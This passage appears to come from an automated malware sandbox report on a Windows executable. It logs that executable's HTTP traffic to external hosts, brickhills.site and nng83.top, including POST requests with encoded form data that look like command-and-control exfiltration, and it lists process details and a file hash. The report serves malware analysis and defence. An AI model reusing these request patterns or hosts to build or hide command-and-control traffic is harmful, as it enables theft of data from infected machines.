                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                85192.168.11.204984438.47.233.480
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.188229084 CET416OUTGET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507761955 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                86192.168.11.2049845103.224.182.24280
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.692557096 CET689OUTPOST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 78 5a 56 78 4a 5a 77 73 5a 6d 72 79 30 76 67 54 63 49 75 7a 67 35 76 4e 33 37 54 2f 50 6c 2b 41 44 78 6f 45 51 58 4d 34 55 4d 54 49 63 33 6e 35 54 76 71 77 5a 4f 66 32 65 48 53 68 4c 45 34 59 4e 77 48 68 4e 63 4d 4c 32 4f 78 69 30 71 50 76 38 6e 4e 6e 42 49 56 4e 32 6f 52 43 6e 33 34 5a 66 6b 33 54 72 34 47 4a 49 55 42 65 6c 77 4a 51 54 50 56 76 4b 2f 2f 6b 31 67 76 72 49 6f 30 49 51 43 34 30 63 31 62 6f 68 49 73 50 72 41 31 39 2b 61 64 72 32 4c 59 78 62 33 71 6d 6b 47 71 74 61 46 62 69 31 44 4e 79 50 59 38 49 53 56 4c 4f 67 4b 39 78 6c 53 64 39 73 5a 70 65 49 61 62 6e 5a 41 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry0vgTcIuzg5vN37T/Pl+ADxoEQXM4UMTIc3n5TvqwZOf2eHShLE4YNwHhNcML2Oxi0qPv8nNnBIVN2oRCn34Zfk3Tr4GJIUBelwJQTPVvK//k1gvrIo0IQC40c1bohIsPrA19+adr2LYxb3qmkGqtaFbi1DNyPY8ISVLOgK9xlSd9sZpeIabnZA==
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891254902 CET874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:56:54 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234214.7907578; expires=Fri, 01-Dec-2034 13:56:54 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                87192.168.11.2049846103.224.182.24280
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.395035982 CET709OUTPOST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 78 5a 56 78 4a 5a 77 73 5a 6d 72 79 31 50 77 54 54 4c 57 7a 72 35 76 4f 39 62 54 2f 42 31 2b 63 44 78 73 45 51 54 56 7a 55 2f 6e 49 63 54 6a 35 53 75 71 77 59 4f 66 32 57 6e 53 6b 55 55 35 55 4e 77 4c 70 4e 65 49 4c 32 4f 6c 69 30 6f 58 76 2f 55 31 6f 48 49 56 44 74 34 52 41 70 58 34 5a 66 6b 33 54 72 35 6d 7a 49 55 5a 65 6c 44 52 51 43 65 56 6f 4a 2f 2f 6e 39 41 76 72 43 34 30 45 51 43 35 52 63 30 48 43 68 4b 6b 50 72 46 52 39 2f 4c 64 73 38 4c 59 7a 47 6e 72 47 30 6d 44 2f 61 6b 69 52 6a 68 42 7a 58 61 4d 6a 58 44 47 55 39 34 4a 56 6d 42 42 50 6f 70 51 32 4b 59 61 38 45 4b 52 64 76 48 30 2f 4b 2f 7a 52 44 51 38 43 39 47 4a 77 43 38 38 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry1PwTTLWzr5vO9bT/B1+cDxsEQTVzU/nIcTj5SuqwYOf2WnSkUU5UNwLpNeIL2Oli0oXv/U1oHIVDt4RApX4Zfk3Tr5mzIUZelDRQCeVoJ//n9AvrC40EQC5Rc0HChKkPrFR9/Lds8LYzGnrG0mD/akiRjhBzXaMjXDGU94JVmBBPopQ2KYa8EKRdvH0/K/zRDQ8C9GJwC88=
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592434883 CET874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:56:57 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234217.8591296; expires=Fri, 01-Dec-2034 13:56:57 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                88192.168.11.2049847103.224.182.24280
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097472906 CET2578OUTPOST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 78 5a 56 78 4a 5a 77 73 5a 6d 72 79 31 50 77 54 54 4c 57 7a 72 35 76 4f 39 62 54 2f 42 31 2b 63 44 78 73 45 51 54 56 7a 55 2f 2f 49 66 6d 33 35 54 4e 43 77 62 4f 66 32 59 48 53 6c 55 55 35 64 4e 77 6a 74 4e 65 45 39 32 4e 64 69 33 4e 4c 76 30 46 31 6f 55 6f 56 44 6b 59 52 42 6e 33 35 45 66 6e 66 66 72 35 57 7a 49 55 5a 65 6c 47 64 51 43 50 56 6f 50 2f 2f 6b 31 67 76 33 49 6f 30 67 51 43 68 6e 63 30 44 34 68 62 45 50 73 6c 42 39 38 35 46 73 6d 4c 59 31 46 6e 72 6b 30 6d 65 68 61 6e 58 67 6a 67 31 64 58 64 34 6a 61 79 72 51 6c 62 42 49 6c 78 64 50 72 4b 45 52 65 71 43 56 61 59 64 67 67 6b 59 45 49 4a 50 45 4a 78 73 56 69 32 68 33 54 73 50 49 7a 59 38 38 69 34 69 33 58 75 4d 38 39 6c 58 6e 6d 4a 47 34 55 74 6c 2b 33 4c 65 63 6a 65 7a 5a 67 55 36 74 76 61 6f 54 68 46 4b 44 66 38 32 56 2b 41 63 68 47 53 4d 48 76 4c 51 69 49 34 76 30 66 6f 51 2b 6e 2f 61 31 50 39 68 44 6c 6a 75 58 46 6a 4f 55 35 38 6a 6b 4b 6f 7a 4f 43 67 5a 36 6f 56 4c 58 79 49 7a 71 51 48 7a 4c 2b 77 51 4e 62 55 61 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry1PwTTLWzr5vO9bT/B1+cDxsEQTVzU//Ifm35TNCwbOf2YHSlUU5dNwjtNeE92Ndi3NLv0F1oUoVDkYRBn35Efnffr5WzIUZelGdQCPVoP//k1gv3Io0gQChnc0D4hbEPslB985FsmLY1Fnrk0mehanXgjg1dXd4jayrQlbBIlxdPrKEReqCVaYdggkYEIJPEJxsVi2h3TsPIzY88i4i3XuM89lXnmJG4Utl+3LecjezZgU6tvaoThFKDf82V+AchGSMHvLQiI4v0foQ+n/a1P9hDljuXFjOU58jkKozOCgZ6oVLXyIzqQHzL+wQNbUafLjmKEJKz6vRxqFwMFkvLhsfABSfrxnBH86YwfMd35nBCRpXhdlF8hUMM4LQt2rVyjWosHqav26pfaepbWBxQ8I3/qkSFpa48IX39BBNQm9Sd4OilVcjAGdEfWmcnbN6sfmU4aprj8OjN6gSxe0FZrD5WjDnHz3GziRQ6ciH1aVUpQhqCTEv4P2nFIgcCZBT7VkO0+nRpgAOhCKq5d0wC/CI+/hPbIan8quFhnCpgXaJH06ICd/z2PvMuPLRKZxFTu1dgXjYgyFqaum2LmE4pNQBD5DFniZ91fLv8OjZdxm3LYOJK4EDPbIeA8VihCa32JUlds9xQmjkFsDZRQEqsXZIICpV0Nv/r0pIp+y79tmCXiOjRo02NmIZ4FxK38CR9FoalI1UX8oe0WPR9l4j0X97KZ4jLFXXQiVp9BDQ1OlbZwF0InWnwFtK90rDPMNjHC3/R9qVebewOJK/wnThZ0RxIUQUsNGZvTlGJOr1d6gmRvcoE1eAKbHzV0Okl5jY7QKQzSSxZkKA30ghTFq7waJ1FbkKxHulMt4mSBpmu14TXHKPMll9eEGd9VrmiTHvoor3Rpu0im8Z2jhjlbVr6WMk1J+1PQmb2vodKsd3xIzgeV6lZtKWPZ26aye9d7gBxklr6gHqulp28S6i7nJt0IbVbIvxSSaYaB [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097537041 CET5156OUTData Raw: 2b 33 2b 6e 39 51 68 37 6f 46 2f 32 50 50 73 4c 44 67 75 70 32 65 6b 74 39 7a 58 32 6f 67 6a 77 65 6f 65 66 6f 35 67 6e 76 52 52 69 50 4b 68 76 53 74 74 56 2f 42 32 43 6b 5a 30 63 50 46 49 6d 42 36 6d 75 7a 54 52 49 6c 43 78 65 77 47 34 42 61 76
                                                                                                                                                                                                                                Data Ascii: +3+n9Qh7oF/2PPsLDgup2ekt9zX2ogjweoefo5gnvRRiPKhvSttV/B2CkZ0cPFImB6muzTRIlCxewG4BavWj4vZPPS4pejifR3iTJ1attUBLhYYgMq+0+qVyFTlLQAVp7xe2rVC6lO/iwnpXLLR1x204NIAJHLun05kRUmQpI1DBxu2e5g3f8gbIuQoI1iht6BCG2Swb+BMwevu6xy0JvCWepCc5FeSrApqcfp9BGvNYwg8Qqvu
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097579002 CET124OUTData Raw: 52 73 78 35 7a 31 64 68 6b 31 66 67 6b 4f 71 6c 47 6a 33 46 4a 47 4c 66 54 53 46 47 54 41 33 35 56 76 4c 6d 48 55 59 66 32 77 67 47 71 6a 49 70 48 43 6f 6d 66 32 43 6f 71 74 36 7a 58 64 58 4f 78 4d 59 79 4c 56 4d 55 75 64 38 52 42 65 34 61 52 48
                                                                                                                                                                                                                                Data Ascii: Rsx5z1dhk1fgkOqlGj3FJGLfTSFGTA35VvLmHUYf2wgGqjIpHComf2Coqt6zXdXOxMYyLVMUud8RBe4aRH2TcQlEX8n91Iq/SoYlU556K4LxCSW7kkKpMulDjg==
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284235001 CET874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:57:00 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234220.8953293; expires=Fri, 01-Dec-2034 13:57:00 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 57 6c 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 f2 24 26 69 50 e4 bf 97 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 b7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 6b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 85 c4 7c b7 37 ef f3 cf c9 22 8a f2 1c 6e 90 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 b7 28 b7 84 0c 7c e0 01 d5 00 b5 08 cf e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b eb b1 54 3a 85 bb 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 25 db bb 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 27 27 df 6f 58 87 a8 d3 bb ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TMo0=pvNWl;a"Y$&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'kh'8CI2(!iy|7"n@6p5A5(|Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#%`'kMs\''oXECy2$&ZB3}jw#:vobIRnz:}[tM<57vG`ZJZm]5!-og-j!LjYa\$U!uqZt8L!tE.1S;Z*:$U/Vim<Ee<[?kX{{11#0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                89192.168.11.2049848103.224.182.24280
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.798958063 CET422OUTGET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993597984 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:57:02 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234222.2137467; expires=Fri, 01-Dec-2034 13:57:02 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-length: 1501
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 76 77 6e 32 2f 3f 5a 31 45 4f 3d 4f 76 66 48 65 6c 75 55 79 26 70 6c 75 78 56 6d 3d 38 62 39 52 4b 74 51 53 42 48 48 30 37 50 78 74 59 73 69 70 6a 4c 2f 6c 71 66 58 71 59 58 2b 6a 51 6d 41 5a 61 77 39 47 52 4f 48 47 59 56 37 34 4d 75 37 78 59 35 72 55 55 47 62 42 53 33 35 6c 50 79 48 74 48 50 51 44 2b 38 56 50 6e 62 6a 75 32 48 74 78 5a 66 63 79 75 71 4d 7a 6a 51 6f 41 46 6d 6d 35 38 73 61 39 4f 58 77 65 38 68 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <html><head><title>brickhills.site</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: non [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993669033 CET484INData Raw: 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 76 77 6e 32 2f 3f 5a 31 45 4f 3d 4f 76 66 48 65 6c 75 55 79 26 70 6c 75 78 56 6d 3d 38 62 39 52 4b 74 51 53 42 48 48 30 37 50 78 74 59 73 69
                                                                                                                                                                                                                                Data Ascii: a href='http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&fp=-3'>Click here to enter</a></div><noscript><meta http-e


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:08:50:25
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                                                                                                                                                                                                                                Imagebase:0xda0000
                                                                                                                                                                                                                                File size:766'976 bytes
                                                                                                                                                                                                                                MD5 hash:8A6F66334502BC3DA28732CCD4353D14
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:08:50:40
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe
